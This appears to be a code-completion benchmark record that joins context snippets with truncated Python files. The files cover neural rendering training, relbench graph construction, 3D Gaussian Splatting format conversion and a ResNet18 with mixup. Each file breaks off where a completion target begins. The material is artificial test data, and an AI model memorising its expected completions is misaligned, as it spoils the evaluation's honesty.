print('Found ckpts', ckpts)\n\n start = 0\n if len(ckpts) > 0:\n ckpt_path = ckpts[-1]\n print('Loading ckpt from:', ckpt_path)\n ckpt = torch.load(ckpt_path)\n\n start = ckpt['global_step']\n model.load_state_dict(ckpt['network_fn'])\n optimizer.load_state_dict(ckpt['optimizer'])\n optimizer.param_groups[0]['capturable'] = True\n scheduler.load_state_dict(ckpt['scheduler'])\n scheduler.last_epoch = ckpt['global_step']\n\n return ray_fn, start, model, model_cls, optimizer, scheduler"
},
{
"identifier": "get_multiview_rays",
"path": "net_multiview/sampler.py",
"snippet": "def get_multiview_rays(args, query_rays, query_gts):\n # define the query surface points\n wcoords = query_rays[..., :3] + query_gts['dist'] * query_rays[..., 3:]\n\n # sample points on a unit sphere to construct vectors\n x = 2. * torch.rand([wcoords.shape[0], args.N_views]) - 1.\n y = 2. * torch.rand([wcoords.shape[0], args.N_views]) - 1.\n z = 2. * torch.rand([wcoords.shape[0], args.N_views]) - 1.\n mv_dirs = torch.stack([x, y, z], dim=-1).to(wcoords.device)\n mv_dirs = mv_dirs / (torch.linalg.norm(mv_dirs, dim=-1, keepdim=True) + EPS)\n rays_d = -mv_dirs\n\n # generate new rays\n dist = args.radius * 2.\n rays_o = wcoords[:, None] - dist * rays_d\n mv_rays = torch.concat([rays_o, rays_d], dim=-1) # (B, N_views, 6)\n target_dict = {'dist': torch.ones_like(rays_d[..., :1]) * dist}\n if args.rgb_layer > 0:\n target_dict['image'] = torch.tile(query_gts['image'][:, None], (1, args.N_views, 1))\n\n mv_rays_flat = mv_rays.reshape(-1, 6)\n for k in target_dict:\n target_dict[k] = target_dict[k].reshape(-1, target_dict[k].shape[-1])\n\n return mv_rays_flat, target_dict"
},
{
"identifier": "get_surface_gradient",
"path": "utils/math.py",
"snippet": "def get_surface_gradient(t, raydirs):\n dt = gradient(t, raydirs)\n return torch.norm(dt, dim=-1, keepdim=True)"
},
{
"identifier": "get_surface_normal",
"path": "utils/math.py",
"snippet": "def get_surface_normal(t, raydirs):\n dt = gradient(t, raydirs)\n dtdtheta, dtdphi = dt[..., :1], dt[..., 1:]\n sin_theta, cos_theta = torch.sin(raydirs[..., :1]), torch.cos(raydirs[..., :1])\n sin_phi, cos_phi = torch.sin(raydirs[..., 1:]), torch.cos(raydirs[..., 1:])\n dtheta = torch.cat([(dtdtheta * sin_theta + t * cos_theta) * cos_phi,\n (dtdtheta * sin_theta + t * cos_theta) * sin_phi,\n dtdtheta * cos_theta - t * sin_theta], dim=-1)\n dphi = torch.cat([(dtdphi * cos_phi - t * sin_phi) * sin_theta,\n (dtdphi * sin_phi + t * cos_phi) * sin_theta,\n dtdphi * cos_theta], dim=-1)\n\n normal = torch.cross(dphi, dtheta)\n normal = normal / (torch.linalg.norm(normal+EPS, dim=-1, keepdim=True)+EPS)\n return normal"
}
] | import os
import torch
import numpy as np
import imageio
import trimesh
import open3d as o3d
import wandb
from tqdm import trange
from config import config_parser
from open3d import pipelines
from wandb import AlertLevel
from utils import log
from utils.math import convert_d
from utils.dataloader import Dataloader
from utils.ray import get_ray_param
from net_multiview.network import create_net
from net_multiview.sampler import get_multiview_rays
from utils.math import get_surface_gradient, get_surface_normal
from torchmetrics.functional import peak_signal_noise_ratio as PSNR
from torchmetrics.functional import structural_similarity_index_measure as SSIM
from torchmetrics.image.lpip import LearnedPerceptualImagePatchSimilarity
from chamfer_distance import ChamferDistance | 3,453 |
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
torch.backends.cudnn.benchmark = True
np.random.seed(0)
LPIPS = LearnedPerceptualImagePatchSimilarity(net_type='alex').to(device)
CD = ChamferDistance().to(device)
def train(args):
# Load dataset
dataloader = Dataloader(args, device)
# Create rayparam function and network
|
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
torch.backends.cudnn.benchmark = True
np.random.seed(0)
LPIPS = LearnedPerceptualImagePatchSimilarity(net_type='alex').to(device)
CD = ChamferDistance().to(device)
def train(args):
# Load dataset
dataloader = Dataloader(args, device)
# Create rayparam function and network | ray_fn, global_step, model, model_cls, optimizer, scheduler = create_net(args, dataloader.scene_info, device) | 5 | 2023-10-30 14:05:51+00:00 | 4k |
snap-stanford/relbench | test/external/test_graph.py | [
{
"identifier": "FakeDataset",
"path": "relbench/datasets/fake.py",
"snippet": "class FakeDataset(Dataset):\n name = \"rel-fake\"\n\n def __init__(\n self, num_products: int = 30, num_customers: int = 100, num_reviews: int = 500\n ):\n db = self.make_db(num_products, num_customers, num_reviews)\n db.reindex_pkeys_and_fkeys()\n val_timestamp = db.min_timestamp + 0.8 * (db.max_timestamp - db.min_timestamp)\n test_timestamp = db.min_timestamp + 0.9 * (db.max_timestamp - db.min_timestamp)\n super().__init__(\n db=db,\n val_timestamp=val_timestamp,\n test_timestamp=test_timestamp,\n task_cls_list=[ChurnTask, LTVTask],\n )\n\n def make_db(self, num_products, num_customers, num_reviews) -> Database:\n product_df = pd.DataFrame(\n {\n \"product_id\": [f\"product_id_{i}\" for i in range(num_products)],\n \"category\": [None, [], [\"toy\", \"health\"]] * (num_products // 3),\n \"title\": [_generate_random_string(5, 15) for _ in range(num_products)],\n \"price\": np.random.rand(num_products) * 10,\n }\n )\n customer_df = pd.DataFrame(\n {\n \"customer_id\": [f\"customer_id_{i}\" for i in range(num_customers)],\n \"age\": np.random.randint(10, 50, size=(num_customers,)),\n \"gender\": [\"male\", \"female\"] * (num_customers // 2),\n }\n )\n # Add some dangling foreign keys:\n review_df = pd.DataFrame(\n {\n \"customer_id\": [\n f\"customer_id_{random.randint(0, num_customers+5)}\"\n for _ in range(num_reviews)\n ],\n \"product_id\": [\n f\"product_id_{random.randint(0, num_products-1)}\"\n for _ in range(num_reviews)\n ],\n \"review_time\": pd.to_datetime(10 * np.arange(num_reviews), unit=\"D\"),\n \"rating\": np.random.randint(1, 6, size=(num_reviews,)),\n }\n )\n\n return Database(\n table_dict={\n \"product\": Table(\n df=product_df,\n fkey_col_to_pkey_table={},\n pkey_col=\"product_id\",\n ),\n \"customer\": Table(\n df=customer_df,\n fkey_col_to_pkey_table={},\n pkey_col=\"customer_id\",\n ),\n \"review\": Table(\n df=review_df,\n fkey_col_to_pkey_table={\n \"customer_id\": \"customer\",\n \"product_id\": \"product\",\n },\n time_col=\"review_time\",\n ),\n }\n )"
},
{
"identifier": "get_stype_proposal",
"path": "relbench/external/graph.py",
"snippet": "def get_stype_proposal(db: Database) -> Dict[str, Dict[str, Any]]:\n r\"\"\"Propose stype for columns of a set of tables in the given database.\n\n Args:\n db (Database): : The database object containing a set of tables.\n\n Returns:\n Dict[str, Dict[str, Any]]: A dictionary mapping table name into\n :obj:`col_to_stype` (mapping column names into inferred stypes).\n \"\"\"\n\n inferred_col_to_stype_dict = {}\n for table_name, table in db.table_dict.items():\n inferred_col_to_stype = infer_df_stype(table.df)\n\n # Remove pkey, fkey columns since they will not be used as input\n # feature.\n if table.pkey_col is not None:\n inferred_col_to_stype.pop(table.pkey_col)\n for fkey in table.fkey_col_to_pkey_table.keys():\n inferred_col_to_stype.pop(fkey)\n\n inferred_col_to_stype_dict[table_name] = inferred_col_to_stype\n\n return inferred_col_to_stype_dict"
},
{
"identifier": "make_pkey_fkey_graph",
"path": "relbench/external/graph.py",
"snippet": "def make_pkey_fkey_graph(\n db: Database,\n col_to_stype_dict: Dict[str, Dict[str, stype]],\n text_embedder_cfg: Optional[TextEmbedderConfig] = None,\n cache_dir: Optional[str] = None,\n) -> HeteroData:\n r\"\"\"Given a :class:`Database` object, construct a heterogeneous graph with\n primary-foreign key relationships, together with the column stats of each\n table.\n\n Args:\n db (Database): A database object containing a set of tables.\n col_to_stype_dict (Dict[str, Dict[str, stype]]): Column to stype for\n each table.\n cache_dir (str, optional): A directory for storing materialized tensor\n frames. If specified, we will either cache the file or use the\n cached file. If not specified, we will not use cached file and\n re-process everything from scrach without saving the cache.\n\n Returns:\n HeteroData: The heterogeneous :class:`PyG` object with\n :class:`TensorFrame` feature.\n \"\"\"\n data = HeteroData()\n if cache_dir is not None:\n os.makedirs(cache_dir, exist_ok=True)\n\n for table_name, table in db.table_dict.items():\n # Materialize the tables into tensor frames:\n df = table.df\n # Ensure that pkey is consecutive.\n if table.pkey_col is not None:\n assert (df[table.pkey_col].values == np.arange(len(df))).all()\n\n col_to_stype = col_to_stype_dict[table_name]\n\n if len(col_to_stype) == 0: # Add constant feature in case df is empty:\n col_to_stype = {\"__const__\": stype.numerical}\n df = pd.DataFrame({\"__const__\": np.ones(len(table.df))})\n\n path = (\n None if cache_dir is None else os.path.join(cache_dir, f\"{table_name}.pt\")\n )\n dataset = Dataset(\n df=df,\n col_to_stype=col_to_stype,\n col_to_text_embedder_cfg=text_embedder_cfg,\n ).materialize(path=path)\n\n data[table_name].tf = dataset.tensor_frame\n data[table_name].col_stats = dataset.col_stats\n\n # Add time attribute:\n if table.time_col is not None:\n data[table_name].time = to_unix_time(table.df[table.time_col])\n\n # Add edges:\n for fkey_name, pkey_table_name in table.fkey_col_to_pkey_table.items():\n pkey_index = df[fkey_name]\n # Filter out dangling foreign keys\n mask = ~pkey_index.isna()\n fkey_index = torch.arange(len(pkey_index))\n # Filter dangling foreign keys:\n pkey_index = torch.from_numpy(pkey_index[mask].astype(int).values)\n fkey_index = fkey_index[torch.from_numpy(mask.values)]\n # Ensure no dangling fkeys\n assert (pkey_index < len(db.table_dict[pkey_table_name])).all()\n\n # fkey -> pkey edges\n edge_index = torch.stack([fkey_index, pkey_index], dim=0)\n edge_type = (table_name, f\"f2p_{fkey_name}\", pkey_table_name)\n data[edge_type].edge_index = sort_edge_index(edge_index)\n\n # pkey -> fkey edges\n edge_index = torch.stack([pkey_index, fkey_index], dim=0)\n edge_type = (pkey_table_name, f\"p2f_{fkey_name}\", table_name)\n data[edge_type].edge_index = sort_edge_index(edge_index)\n\n data.validate()\n\n return data"
}
] | from torch_frame import TensorFrame
from torch_frame.config import TextEmbedderConfig
from torch_frame.testing.text_embedder import HashTextEmbedder
from relbench.datasets import FakeDataset
from relbench.external.graph import get_stype_proposal, make_pkey_fkey_graph | 1,922 |
def test_make_pkey_fkey_graph():
dataset = FakeDataset()
data = make_pkey_fkey_graph(
dataset.db,
|
def test_make_pkey_fkey_graph():
dataset = FakeDataset()
data = make_pkey_fkey_graph(
dataset.db, | get_stype_proposal(dataset.db), | 1 | 2023-10-29 18:29:52+00:00 | 4k |
francescofugazzi/3dgsconverter | gsconverter/utils/conversion_functions.py | [
{
"identifier": "Format3dgs",
"path": "gsconverter/utils/format_3dgs.py",
"snippet": "class Format3dgs(BaseConverter):\n def to_cc(self, process_rgb=True):\n debug_print(\"[DEBUG] Starting conversion from 3DGS to CC...\")\n \n # Load vertices from the provided data\n vertices = self.data\n debug_print(f\"[DEBUG] Loaded {len(vertices)} vertices.\")\n\n # Check if RGB processing is required\n if process_rgb:\n debug_print(\"[DEBUG] RGB processing is enabled.\")\n\n # Compute RGB values for the vertices\n rgb_values = Utility.compute_rgb_from_vertex(vertices)\n\n if rgb_values is not None:\n # Define a new data type for the vertices that includes RGB\n new_dtype, prefix = BaseConverter.define_dtype(has_scal=True, has_rgb=True)\n\n # Create a new numpy array with the new data type\n converted_data = np.zeros(vertices.shape, dtype=new_dtype)\n\n # Copy the vertex data to the new numpy array\n Utility.copy_data_with_prefix_check(vertices, converted_data, [prefix])\n\n # Add the RGB values to the new numpy array\n converted_data['red'] = rgb_values[:, 0]\n converted_data['green'] = rgb_values[:, 1]\n converted_data['blue'] = rgb_values[:, 2]\n\n debug_print(\"RGB processing completed.\")\n else:\n debug_print(\"[DEBUG] RGB computation failed. Skipping RGB processing.\")\n process_rgb = False\n\n if not process_rgb:\n debug_print(\"[DEBUG] RGB processing is skipped.\")\n\n # Define a new data type for the vertices without RGB\n new_dtype, prefix = BaseConverter.define_dtype(has_scal=True, has_rgb=False)\n\n # Create a new numpy array with the new data type\n converted_data = np.zeros(vertices.shape, dtype=new_dtype)\n\n # Copy the vertex data to the new numpy array\n Utility.copy_data_with_prefix_check(vertices, converted_data, [prefix])\n\n # For now, we'll just return the converted_data for the sake of this integration\n debug_print(\"[DEBUG] Conversion from 3DGS to CC completed.\")\n return converted_data\n\n def to_3dgs(self):\n debug_print(\"[DEBUG] Starting conversion from 3DGS to 3DGS...\")\n\n # Load vertices from the updated data after all filters\n vertices = self.data\n debug_print(f\"[DEBUG] Loaded {len(vertices)} vertices.\")\n\n # Create a new structured numpy array for 3DGS format\n dtype_3dgs = self.define_dtype(has_scal=False, has_rgb=False) # Define 3DGS dtype without any prefix\n converted_data = np.zeros(vertices.shape, dtype=dtype_3dgs)\n\n # Use the helper function to copy the data from vertices to converted_data\n Utility.copy_data_with_prefix_check(vertices, converted_data, [\"\", \"scal_\", \"scalar_\", \"scalar_scal_\"])\n\n debug_print(\"[DEBUG] Data copying completed.\")\n debug_print(\"[DEBUG] Sample of converted data (first 5 rows):\")\n if config.DEBUG:\n for i in range(5):\n debug_print(converted_data[i])\n\n debug_print(\"[DEBUG] Conversion from 3DGS to 3DGS completed.\")\n return converted_data"
},
{
"identifier": "FormatCC",
"path": "gsconverter/utils/format_cc.py",
"snippet": "class FormatCC(BaseConverter):\n def to_3dgs(self):\n debug_print(\"[DEBUG] Starting conversion from CC to 3DGS...\")\n\n # Load vertices from the updated data after all filters\n vertices = self.data\n debug_print(f\"[DEBUG] Loaded {len(vertices)} vertices.\")\n\n # Create a new structured numpy array for 3DGS format\n dtype_3dgs = self.define_dtype(has_scal=False, has_rgb=False) # Define 3DGS dtype without any prefix\n converted_data = np.zeros(vertices.shape, dtype=dtype_3dgs)\n\n # Use the helper function to copy the data from vertices to converted_data\n Utility.copy_data_with_prefix_check(vertices, converted_data, [\"\", \"scal_\", \"scalar_\", \"scalar_scal_\"])\n\n debug_print(\"[DEBUG] Data copying completed.\")\n debug_print(\"[DEBUG] Sample of converted data (first 5 rows):\")\n if config.DEBUG:\n for i in range(5):\n debug_print(converted_data[i])\n\n debug_print(\"[DEBUG] Conversion from CC to 3DGS completed.\")\n return converted_data\n\n\n def to_cc(self, process_rgb=False):\n debug_print(\"[DEBUG] Processing CC data...\")\n\n # Check if RGB processing is required\n if process_rgb and not self.has_rgb():\n self.add_rgb()\n debug_print(\"[DEBUG] RGB added to data.\")\n else:\n debug_print(\"[DEBUG] RGB processing is skipped or data already has RGB.\")\n \n converted_data = self.data\n \n # For now, we'll just return the converted_data for the sake of this integration\n debug_print(\"[DEBUG] CC data processing completed.\")\n return converted_data\n\n def add_or_ignore_rgb(self, process_rgb=True):\n debug_print(\"[DEBUG] Checking RGB for CC data...\")\n\n # If RGB processing is required and RGB is not present\n if process_rgb and not self.has_rgb():\n # Compute RGB values for the data\n rgb_values = Utility.compute_rgb_from_vertex(self.data)\n\n # Get the new dtype definition from the BaseConverter class\n new_dtype_list, _ = BaseConverter.define_dtype(has_scal=True, has_rgb=True)\n new_dtype = np.dtype(new_dtype_list)\n\n # Create a new structured array that includes fields for RGB\n # It should have the same number of rows as the original data\n converted_data = np.zeros(self.data.shape[0], dtype=new_dtype)\n\n # Copy the data to the new numpy array, preserving existing fields\n for name in self.data.dtype.names:\n converted_data[name] = self.data[name]\n\n # Add the RGB values to the new numpy array\n converted_data['red'] = rgb_values[:, 0]\n converted_data['green'] = rgb_values[:, 1]\n converted_data['blue'] = rgb_values[:, 2]\n\n self.data = converted_data # Update the instance's data with the new data\n debug_print(\"[DEBUG] RGB added to data.\")\n else:\n debug_print(\"[DEBUG] RGB processing is skipped or data already has RGB.\")\n converted_data = self.data # If RGB is not added or skipped, the converted_data is just the original data.\n\n # Return the converted_data\n debug_print(\"[DEBUG] RGB check for CC data completed.\")\n return converted_data"
},
{
"identifier": "FormatParquet",
"path": "gsconverter/utils/format_parquet.py",
"snippet": "class FormatParquet(BaseConverter):\n def to_cc(self, process_rgb=True):\n debug_print(\"[DEBUG] Starting conversion from PARQUET to CC...\")\n \n # Load vertices from the provided data\n vertices = self.data\n debug_print(f\"[DEBUG] Loaded {len(vertices)} vertices.\")\n\n # Check if RGB processing is required\n if process_rgb:\n debug_print(\"[DEBUG] RGB processing is enabled.\")\n\n # Compute RGB values for the vertices\n rgb_values = Utility.compute_rgb_from_vertex(vertices)\n\n if rgb_values is not None:\n # Define a new data type for the vertices that includes RGB\n new_dtype, prefix = BaseConverter.define_dtype(has_scal=True, has_rgb=True)\n\n # Create a new numpy array with the new data type\n converted_data = np.zeros(vertices.shape, dtype=new_dtype)\n\n # Copy the vertex data to the new numpy array\n Utility.copy_data_with_prefix_check(vertices, converted_data, [prefix])\n\n # Add the RGB values to the new numpy array\n converted_data['red'] = rgb_values[:, 0]\n converted_data['green'] = rgb_values[:, 1]\n converted_data['blue'] = rgb_values[:, 2]\n\n debug_print(\"RGB processing completed.\")\n else:\n debug_print(\"[DEBUG] RGB computation failed. Skipping RGB processing.\")\n process_rgb = False\n\n if not process_rgb:\n debug_print(\"[DEBUG] RGB processing is skipped.\")\n\n # Define a new data type for the vertices without RGB\n new_dtype, prefix = BaseConverter.define_dtype(has_scal=True, has_rgb=False)\n\n # Create a new numpy array with the new data type\n converted_data = np.zeros(vertices.shape, dtype=new_dtype)\n\n # Copy the vertex data to the new numpy array\n Utility.copy_data_with_prefix_check(vertices, converted_data, [prefix])\n\n # For now, we'll just return the converted_data for the sake of this integration\n debug_print(\"[DEBUG] Conversion from PARQUET to CC completed.\")\n return converted_data\n\n def to_3dgs(self):\n debug_print(\"[DEBUG] Starting conversion from PARQUET to 3DGS...\")\n\n # Load vertices from the updated data after all filters\n vertices = self.data\n debug_print(f\"[DEBUG] Loaded {len(vertices)} vertices.\")\n\n # Create a new structured numpy array for 3DGS format\n dtype_3dgs = self.define_dtype(has_scal=False, has_rgb=False) # Define 3DGS dtype without any prefix\n converted_data = np.zeros(vertices.shape, dtype=dtype_3dgs)\n\n # Use the helper function to copy the data from vertices to converted_data\n Utility.copy_data_with_prefix_check(vertices, converted_data, [\"\", \"scal_\", \"scalar_\", \"scalar_scal_\"])\n\n debug_print(\"[DEBUG] Data copying completed.\")\n debug_print(\"[DEBUG] Sample of converted data (first 5 rows):\")\n if config.DEBUG:\n for i in range(5):\n debug_print(converted_data[i])\n\n debug_print(\"[DEBUG] Conversion from PARQUET to 3DGS completed.\")\n return converted_data"
},
{
"identifier": "debug_print",
"path": "gsconverter/utils/utility_functions.py",
"snippet": "def debug_print(message):\n if config.DEBUG:\n print(message)"
},
{
"identifier": "process_data",
"path": "gsconverter/utils/data_processing.py",
"snippet": "def process_data(data_object, bbox=None, apply_density_filter=False, remove_flyers=False):\n # Crop the data based on the bounding box if specified\n if bbox:\n min_x, min_y, min_z, max_x, max_y, max_z = bbox\n data_object.crop_by_bbox(min_x, min_y, min_z, max_x, max_y, max_z)\n debug_print(\"[DEBUG] Bounding box cropped.\")\n \n # Apply density filter if required\n if apply_density_filter:\n data_object.data = data_object.apply_density_filter()\n debug_print(\"[DEBUG] Density filter applied.\")\n\n # Remove flyers if required\n if remove_flyers:\n data_object.data = data_object.remove_flyers()\n debug_print(\"[DEBUG] Flyers removed.\")"
}
] | import numpy as np
from .format_3dgs import Format3dgs
from .format_cc import FormatCC
from .format_parquet import FormatParquet
from .utility_functions import debug_print
from .data_processing import process_data # Place this import statement at the top with other imports | 2,662 | """
3D Gaussian Splatting Converter
Copyright (c) 2023 Francesco Fugazzi
This software is released under the MIT License.
For more information about the license, please see the LICENSE file.
"""
def convert(data, source_format, target_format, **kwargs):
| """
3D Gaussian Splatting Converter
Copyright (c) 2023 Francesco Fugazzi
This software is released under the MIT License.
For more information about the license, please see the LICENSE file.
"""
def convert(data, source_format, target_format, **kwargs): | debug_print(f"[DEBUG] Starting conversion from {source_format} to {target_format}...") | 3 | 2023-10-28 15:09:50+00:00 | 4k |
solangii/MICS | models/network/resnet18.py | [
{
"identifier": "to_one_hot",
"path": "utils/mixup_utils.py",
"snippet": "def to_one_hot(inp, num_classes):\n y_onehot = torch.FloatTensor(inp.size(0), num_classes)\n y_onehot.zero_()\n\n y_onehot.scatter_(1, inp.unsqueeze(1).data.cpu(), 1)\n\n return Variable(y_onehot.cuda(), requires_grad=False)"
},
{
"identifier": "middle_mixup_process",
"path": "utils/mixup_utils.py",
"snippet": "def middle_mixup_process(out, target_reweighted, num_base_classes, lam, use_hard_positive_aug,\n add_noise_level=0., mult_noise_level=0., hpa_type=\"none\",\n label_sharpening=True, label_mix=\"vanilla\", label_mix_threshold=0.2, exp_coef=1.,\n predefined_indices=None, gaussian_h1=0.2, piecewise_linear_h1=0.5, piecewise_linear_h2=0., use_softlabel=True):\n indices = np.random.permutation(out.size(0))\n out = out * lam + out[indices] * (1 - lam)\n target_reweighted, mix_label_mask = middle_label_mix_process(target_reweighted, target_reweighted[indices],\n num_base_classes, lam, label_mix,\n label_mix_threshold, exp_coef, gaussian_h1,\n piecewise_linear_h1, piecewise_linear_h2, use_softlabel)\n return out, target_reweighted, mix_label_mask"
},
{
"identifier": "get_lambda",
"path": "utils/mixup_utils.py",
"snippet": "def get_lambda(alpha=1.0):\n '''Return lambda'''\n if alpha > 0.:\n lam = np.random.beta(alpha, alpha)\n else:\n lam = 1.\n return lam"
}
] | import torch
import torch.nn as nn
import errno
import hashlib
import os
import warnings
import re
import shutil
import sys
import tempfile
import numpy as np
import random
from tqdm import tqdm
from urllib.request import urlopen
from urllib.parse import urlparse
from utils.mixup_utils import to_one_hot, middle_mixup_process, get_lambda
from torch.autograd import Variable | 3,449 | out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000, zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None, avg_downsample=False):
super(ResNet, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self._norm_layer = norm_layer
self.inplanes = 64
self.num_classes = num_classes
self.dilation = 1
self.avg_downsample = avg_downsample
if replace_stride_with_dilation is None:
# each element in the tuple indicates if we should replace
# the 2x2 stride with a dilated convolution instead
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError("replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
if avg_downsample:
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=1, padding=3, bias=False)
else:
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2,
dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256, layers[2], stride=2,
dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512, layers[3], stride=2,
dilate=replace_stride_with_dilation[2])
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
# self.fc = nn.Linear(512 * block.expansion, num_classes,bias=False)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-initialize the last BN in each residual branch,
# so that the residual branch starts with zeros, and each residual block behaves like an identity.
# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block, planes, blocks, stride=1, dilate=False):
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer, self.avg_downsample))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def forward(self, x, target=None, mix_type="vanilla", mixup_alpha=None, num_base_classes=-1,
use_hard_positive_aug=False, add_noise_level=0., mult_noise_level=0., minimum_lambda=0.5,
hpa_type="none", label_sharpening=True, label_mix="vanilla", label_mix_threshold=0.2,
exp_coef=1., cutmix_prob=1., num_similar_class=3, classifiers=None,
gaussian_h1=0.2, piecewise_linear_h1=0.5, piecewise_linear_h2=0., use_softlabel=True):
if "mixup_hidden" in mix_type:
layer_mix = random.randint(0, 3)
else:
layer_mix = None
out = x
if mixup_alpha is not None:
lam = get_lambda(mixup_alpha)
# https://github.com/YU1ut/MixMatch-pytorch/blob/master/train.py#L243
if use_hard_positive_aug:
lam = max(lam, 1 - lam)
lam = max(lam, minimum_lambda)
lam = torch.from_numpy(np.array([lam]).astype('float32')).cuda()
lam = Variable(lam)
if target is not None:
target_reweighted = to_one_hot(target, self.num_classes)
if layer_mix == 0:
|
def load_state_dict_from_url(url, model_dir=None, map_location=None, progress=True):
r"""Loads the Torch serialized object at the given URL.
If the object is already present in `model_dir`, it's deserialized and
returned. The filename part of the URL should follow the naming convention
``filename-<sha256>.ext`` where ``<sha256>`` is the first eight or more
digits of the SHA256 hash of the contents of the file. The hash is used to
ensure unique names and to verify the contents of the file.
The default value of `model_dir` is ``$TORCH_HOME/checkpoints`` where
environment variable ``$TORCH_HOME`` defaults to ``$XDG_CACHE_HOME/torch``.
``$XDG_CACHE_HOME`` follows the X Design Group specification of the Linux
filesytem layout, with a default value ``~/.cache`` if not set.
Args:
url (string): URL of the object to download
model_dir (string, optional): directory in which to save the object
map_location (optional): a function or a dict specifying how to remap storage locations (see torch.load)
progress (bool, optional): whether or not to display a progress bar to stderr
Example:
>>> state_dict = torch.hub.load_state_dict_from_url('https://s3.amazonaws.com/pytorch/models/resnet18-5c106cde.pth')
"""
# Issue warning to move data if old env is set
if os.getenv('TORCH_MODEL_ZOO'):
warnings.warn('TORCH_MODEL_ZOO is deprecated, please use env TORCH_HOME instead')
if model_dir is None:
torch_home = _get_torch_home()
model_dir = os.path.join(torch_home, 'checkpoints')
try:
os.makedirs(model_dir)
except OSError as e:
if e.errno == errno.EEXIST:
# Directory already exists, ignore.
pass
else:
# Unexpected OSError, re-raise.
raise
parts = urlparse(url)
filename = os.path.basename(parts.path)
cached_file = os.path.join(model_dir, filename)
if not os.path.exists(cached_file):
sys.stderr.write('Downloading: "{}" to {}\n'.format(url, cached_file))
hash_prefix = HASH_REGEX.search(filename).group(1)
_download_url_to_file(url, cached_file, hash_prefix, progress=progress)
return torch.load(cached_file, map_location=map_location)
def _download_url_to_file(url, dst, hash_prefix, progress):
file_size = None
u = urlopen(url)
meta = u.info()
if hasattr(meta, 'getheaders'):
content_length = meta.getheaders("Content-Length")
else:
content_length = meta.get_all("Content-Length")
if content_length is not None and len(content_length) > 0:
file_size = int(content_length[0])
# We deliberately save it in a temp file and move it after
# download is complete. This prevents a local working checkpoint
# being overriden by a broken download.
dst_dir = os.path.dirname(dst)
f = tempfile.NamedTemporaryFile(delete=False, dir=dst_dir)
try:
if hash_prefix is not None:
sha256 = hashlib.sha256()
with tqdm(total=file_size, disable=not progress,
unit='B', unit_scale=True, unit_divisor=1024) as pbar:
while True:
buffer = u.read(8192)
if len(buffer) == 0:
break
f.write(buffer)
if hash_prefix is not None:
sha256.update(buffer)
pbar.update(len(buffer))
f.close()
if hash_prefix is not None:
digest = sha256.hexdigest()
if digest[:len(hash_prefix)] != hash_prefix:
raise RuntimeError('invalid hash value (expected "{}", got "{}")'
.format(hash_prefix, digest))
shutil.move(f.name, dst)
finally:
f.close()
if os.path.exists(f.name):
os.remove(f.name)
ENV_TORCH_HOME = 'TORCH_HOME'
ENV_XDG_CACHE_HOME = 'XDG_CACHE_HOME'
DEFAULT_CACHE_DIR = '~/.cache'
HASH_REGEX = re.compile(r'-([a-f0-9]*)\.')
def _get_torch_home():
torch_home = os.path.expanduser(
os.getenv(ENV_TORCH_HOME,
os.path.join(os.getenv(ENV_XDG_CACHE_HOME, DEFAULT_CACHE_DIR), 'torch')))
return torch_home
__all__ = ['ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101',
'resnet152', 'resnext50_32x4d', 'resnext101_32x8d',
'wide_resnet50_2', 'wide_resnet101_2']
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',
'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',
'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',
'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',
}
def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=dilation, groups=groups, bias=False, dilation=dilation)
